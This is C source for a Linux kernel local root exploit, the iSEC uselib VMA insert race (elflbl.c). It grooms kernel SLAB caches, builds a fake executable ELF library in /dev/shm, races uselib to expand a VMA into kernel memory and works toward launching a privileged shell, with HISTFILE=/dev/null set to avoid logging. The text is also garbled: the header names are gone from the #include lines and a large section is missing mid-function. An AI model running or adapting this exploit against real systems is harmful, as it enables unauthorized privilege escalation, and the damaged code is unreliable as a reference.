/* * binfmt_elf uselib VMA insert race vulnerability * v1.08 * * gcc -O2 -fomit-frame-pointer elflbl.c -o elflbl * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define str(s) #s #define xstr(s) str(s) #define MREMAP_MAYMOVE 1 // temp lib location #define LIBNAME "/dev/shm/_elf_lib" // shell name #define SHELL "/bin/bash" // time delta to detect race #define RACEDELTA 5000 // if you have more deadbabes in memory, change this #define MAGIC 0xdeadbabe // do not touch #define SLAB_THRSH 128 #define SLAB_PER_CHLD (INT_MAX - 1) #define LIB_SIZE ( PAGE_SIZE * 4 ) #define STACK_SIZE ( PAGE_SIZE * 4 ) #define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE ) #define ENTRY_GATE ( LDT_ENTRIES-1 ) #define SEL_GATE ( (ENTRY_GATE<<3)|0x07 ) #define ENTRY_LCS ( ENTRY_GATE-2 ) #define SEL_LCS ( (ENTRY_LCS<<3)|0x04 ) #define ENTRY_LDS ( ENTRY_GATE-1 ) #define SEL_LDS ( (ENTRY_LDS<<3)|0x04 ) #define kB * 1024 #define MB * 1024 kB #define GB * 1024 MB #define TMPLEN 256 #define PGD_SIZE ( PAGE_SIZE*1024 ) extern char **environ; static char cstack[STACK_SIZE]; static char name[TMPLEN]; static char line[TMPLEN]; static volatile int val = 0, go = 0, finish = 0, scnt = 0, ccnt=0, delta = 0, delta_max = RACEDELTA, map_flags = PROT_WRITE|PROT_READ; static int fstop=0, silent=0, pidx, pnum=0, smp_max=0, smp, wtime=2, cpid, uid, task_size, old_esp, lib_addr, map_count=0, map_base=0, map_addr, addr_min, addr_max, vma_start, vma_end, max_page; static struct timeval tm1, tm2; static char *myenv[] = {"TERM=vt100", "HISTFILE=/dev/null", NULL}; static char hellc0de[] = "\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70" "\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75\x65\x52\x00"; static char *pagemap, *libname=LIBNAME, *shellname=SHELL; #define __NR_sys_gettimeofday __NR_gettimeofday #define __NR_sys_sched_yield __NR_sched_yield #define __NR_sys_madvise __NR_madvise #define __NR_sys_uselib __NR_uselib #define __NR_sys_mmap2 __NR_mmap2 #define __NR_sys_munmap __NR_munmap #define __NR_sys_mprotect __NR_mprotect #define __NR_sys_mremap __NR_mremap inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f); inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e); inline _syscall3(int, sys_madvise, void*, a, int, b, int, c); inline _syscall3(int, sys_mprotect, int, a, int, b, int, c); inline _syscall3( int, modify_ldt, int, func, void *, ptr, int, bytecount ); inline _syscall2(int, sys_gettimeofday, void*, a, void*, b); inline _syscall2(int, sys_munmap, int, a, int, b); inline _syscall1(int, sys_uselib, char*, l); inline _syscall0(void, sys_sched_yield); inline int tmdiff(struct timeval *t1, struct timeval *t2) { int r; r=t2->tv_sec - t1->tv_sec; r*=1000000; r+=t2->tv_usec - t1->tv_usec; return r; } void fatal(const char *message, int critical) { int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL); if(!errno) { fprintf(stdout, "\n[-] FAILED: %s ", message); } else { fprintf(stdout, "\n[-] FAILED: %s (%s) ", message, (char*) (strerror(errno)) ); } if(critical) printf("\nCRITICAL, entering endless loop"); printf("\n"); fflush(stdout); unlink(libname); kill(cpid, SIGKILL); for(;;) kill(0, sig); } // try to race do_brk sleeping on kmalloc, may need modification for SMP int raceme(void* v) { finish=1; for(;;) { errno = 0; // check if raced: recheck: if(!go) sys_sched_yield(); sys_gettimeofday(&tm2, NULL); delta = tmdiff(&tm1, &tm2); if(!smp_max && delta < (unsigned)delta_max) goto recheck; smp = smp_max; // check if lib VMAs exist as expected under race condition recheck2: val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL); if(val) continue; errno = 0; val = sys_madvise((void*) (lib_addr+PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if( !val || (val<0 && errno!=ENOMEM) ) continue; // SMP? smp--; if(smp>=0) goto recheck2; // recheck race if(!go) continue; finish++; // we need to free one vm_area_struct for mmap to work val = sys_mprotect(map_addr, PAGE_SIZE, map_flags); if(val) fatal("mprotect", 0); val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(-1==val) fatal("mmap2 race", 0); printf("\n[+] race won maps=%d", map_count); fflush(stdout); _exit(0); } return 0; } int callme_1() { return val++; } inline int valid_ptr(unsigned ptr) { return ptr>=task_size && ptr> 16; l.limit = MAGIC & 0xffff; l.limit_in_pages = 1; if( modify_ldt(1, &l, sizeof(l)) != 0 ) fatal("modify_ldt", 1); pidx = max_page-1; } else if(pnum==3) { npg=0; for(pidx=0; pidx<=max_page-1; pidx++) { if(pagemap[pidx]) { npg++; fflush(stdout); } else if(npg == LDT_PAGES) { npg=0; try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE); } else { npg=0; } } fatal("find LDT", 1); } // save context & scan page table __asm__("movl %%esp, %0" : :"m"(old_esp) ); map_addr = addr_max; scan_mm(); } // return number of available SLAB objects in cache int get_slab_objs(const char *sn) { static int c, d, u = 0, a = 0; FILE *fp=NULL; fp = fopen("/proc/slabinfo", "r"); if(!fp) fatal("get_slab_objs: fopen", 0); fgets(name, sizeof(name) - 1, fp); do { c = u = a = -1; if (!fgets(line, sizeof(line) - 1, fp)) break; c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d); } while (strcmp(name, sn)); close(fileno(fp)); fclose(fp); return c == 7 ? a - u : -1; } // leave one object in the SLAB inline void prepare_slab() { int *r; map_addr -= PAGE_SIZE; map_count++; map_flags ^= PROT_READ; r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED == r) { fatal("try again", 0); } *r = map_addr; } // sig handlers void segvcnt(int v) { scnt++; scan_mm_finish(); } // child reap void reaper(int v) { ccnt++; waitpid(0, &v, WNOHANG|WUNTRACED); } // sometimes I get the VMAs in reversed order... // so just use anyone of the two but take care about the flags void check_vma_flags(); void vreversed(int v) { map_flags = 0; check_vma_flags(); } void check_vma_flags() { if(map_flags) { __asm__("movl %%esp, %0" : :"m"(old_esp) ); } else { __asm__("movl %0, %%esp" : :"m"(old_esp) ); goto out; } signal(SIGSEGV, vreversed); val = * (unsigned*)(lib_addr + PAGE_SIZE); out: } // use elf library and try to sleep on kmalloc void exploitme() { int r, sz, pcnt=0; static char smiley[]="-\\|/-\\|/"; // printf("\n cat /proc/%d/maps", getpid() ); fflush(stdout); // helper clone finish=0; ccnt=0; sz = sizeof(cstack) / sizeof(cstack[0]); cpid = clone(&raceme, (void*) &cstack[sz-16], CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL ); if(-1==cpid) fatal("clone", 0); // synchronize threads while(!finish) sys_sched_yield(); finish=0; if(!silent) { printf("\n"); fflush(stdout); } // try to hit the kmalloc race for(;;) { r = get_slab_objs("vm_area_struct"); while(r != 1) { prepare_slab(); r--; } sys_gettimeofday(&tm1, NULL); go = 1; r=sys_uselib(libname); go = 0; if(r) fatal("uselib", 0); if(finish) break; // wipe lib VMAs and try again r = sys_munmap(lib_addr, LIB_SIZE); if(r) fatal("munmap lib", 0); if(ccnt) goto failed; if( !silent && !(pcnt%64) ) { printf("\r Wait... %c", smiley[ (pcnt/64)%8 ]); fflush(stdout); } pcnt++; } // seems we raced, free mem r = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE); if(r) fatal("munmap 1", 0); r = sys_munmap(lib_addr, PAGE_SIZE); if(r) fatal("munmap 2", 0); // relax kswapd sys_gettimeofday(&tm1, NULL); for(;;) { sys_sched_yield(); sys_gettimeofday(&tm2, NULL); delta = tmdiff(&tm1, &tm2); if( wtime*1000000U <= (unsigned)delta ) break; } // we need to check the PROT_EXEC flag map_flags = PROT_EXEC; check_vma_flags(); if(!map_flags) { printf("\n VMAs reversed"); fflush(stdout); } // write protect brk's VMA to fool vm_enough_memory() r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE, PROT_READ|map_flags); if(-1==r) { fatal("mprotect brk", 0); } // this will finally make the big VMA... sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE; expand: r = sys_madvise((void*)(lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if(r) fatal("madvise", 0); r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE, PAGE_SIZE, sz, MREMAP_MAYMOVE, 0); if(-1==r) { if(0==sz) { fatal("mremap: expand VMA", 0); } else { sz -= PAGE_SIZE; goto expand; } } vma_start = lib_addr + PAGE_SIZE; vma_end = vma_start + sz + 2*PAGE_SIZE; printf("\n expanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end); fflush(stdout); // try to figure kernel layout signal(SIGCHLD, reaper); signal(SIGSEGV, segvcnt); signal(SIGBUS, segvcnt); scan_mm_start(); failed: fatal("try again", 0); } // make fake ELF library void make_lib() { struct elfhdr eh; struct elf_phdr eph; static char tmpbuf[PAGE_SIZE]; int fd; // make our elf library umask(022); unlink(libname); fd=open(libname, O_RDWR|O_CREAT|O_TRUNC, 0755); if(fd<0) fatal("open lib ("LIBNAME" not writable?)", 0); memset(&eh, 0, sizeof(eh) ); // elf exec header memcpy(eh.e_ident, ELFMAG, SELFMAG); eh.e_type = ET_EXEC; eh.e_machine = EM_386; eh.e_phentsize = sizeof(struct elf_phdr); eh.e_phnum = 1; eh.e_phoff = sizeof(eh); write(fd, &eh, sizeof(eh) ); // section header: memset(&eph, 0, sizeof(eph) ); eph.p_type = PT_LOAD; eph.p_offset = 4096; eph.p_filesz = 4096; eph.p_vaddr = lib_addr; eph.p_memsz = LIB_SIZE; eph.p_flags = PF_W|PF_R|PF_X; write(fd, &eph, sizeof(eph) ); // execable code lseek(fd, 4096, SEEK_SET); memset(tmpbuf, 0x90, sizeof(tmpbuf) ); write(fd, &tmpbuf, sizeof(tmpbuf) ); close(fd); } // move stack down #2 void prepare_finish() { int r; static struct sysinfo si; old_esp &= ~(PAGE_SIZE-1); old_esp -= PAGE_SIZE; task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB; r = sys_munmap(old_esp, task_size-old_esp); if(r) fatal("unmap stack", 0); // setup rt env uid = getuid(); lib_addr = task_size - LIB_SIZE - PAGE_SIZE; if(map_base) map_addr = map_base; else map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1); printf("\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x", old_esp, task_size, map_base); fflush(stdout); // check physical mem & prepare sysinfo(&si); addr_min = task_size + si.totalram; addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1); addr_max = addr_min + si.totalram; if((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max < (unsigned)addr_min) addr_max = 0xffffd000; printf("\n[+] vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max); max_page = (addr_max - addr_min) / PAGE_SIZE; pagemap = malloc( max_page + 32 ); if(!pagemap) fatal("malloc pagemap", 1); memset(pagemap, 0, max_page + 32); // go go make_lib(); exploitme(); } // move stack down #1 void prepare() { unsigned p=0; environ = myenv; p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0 ); if(-1==p) fatal("mmap2 stack", 0); p += STACK_SIZE - 64; __asm__("movl %%esp, %0 \n" "movl %1, %%esp \n" : : "m"(old_esp), "m"(p) ); prepare_finish(); } void chldcnt(int v) { ccnt++; } // alloc slab objects... inline void do_wipe() { int *r, c=0, left=0; __asm__("movl %%esp, %0" : : "m"(old_esp) ); old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1); old_esp = map_base? map_base : old_esp; for(;;) { if(left<=0) left = get_slab_objs("vm_area_struct"); if(left <= SLAB_THRSH) break; left--; map_flags ^= PROT_READ; old_esp -= PAGE_SIZE; r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 ); if(MAP_FAILED == r) break; if(c>SLAB_PER_CHLD) break; if( (c%1024)==0 ) { if(!c) printf("\n"); printf("\r child %d VMAs %d", val, c); fflush(stdout); } c++; } printf("\r child %d VMAs %d", val, c); fflush(stdout); kill(getppid(), SIGUSR1); for(;;) pause(); } // empty SLAB caches void wipe_slab() { signal(SIGUSR1, chldcnt); printf("\n[+] SLAB cleanup"); fflush(stdout); for(;;) { ccnt=0; val++; cpid = fork(); if(!cpid) do_wipe(); while(!ccnt) sys_sched_yield(); if( get_slab_objs("vm_area_struct") <= SLAB_THRSH ) break; } signal(SIGUSR1, SIG_DFL); } void usage(char *n) { printf("\nUsage: %s\t-f forced stop\n", n); printf("\t\t-s silent mode\n"); printf("\t\t-c command to run\n"); printf("\t\t-n SMP iterations\n"); printf("\t\t-d race delta us\n"); printf("\t\t-w wait time seconds\n"); printf("\t\t-l alternate lib name\n"); printf("\t\t-a alternate addr hex\n"); printf("\n"); _exit(1); } // give -s for forced stop, -b to clean SLAB int main(int ac, char **av) { int r; while(ac) { r = getopt(ac, av, "n:l:a:w:c:d:fsh"); if(r<0) break; switch(r) { case 'f' : fstop = 1; break; case 's' : silent = 1; break; case 'n' : smp_max = atoi(optarg); break; case 'd': if(1!=sscanf(optarg, "%u", &delta_max) || delta_max > 100000u ) fatal("bad delta value", 0); break; case 'w' : wtime = atoi(optarg); if(wtime<0) fatal("bad wait value", 0); break; case 'l' : libname = strdup(optarg); break; case 'c' : shellname = strdup(optarg); break; case 'a' : if(1!=sscanf(optarg, "%x", &map_base)) fatal("bad addr value", 0); map_base &= ~(PGD_SIZE-1); break; case 'h' : default: usage(av[0]); break; } } // basic setup uid = getuid(); setpgrp(); wipe_slab(); prepare(); return 0; }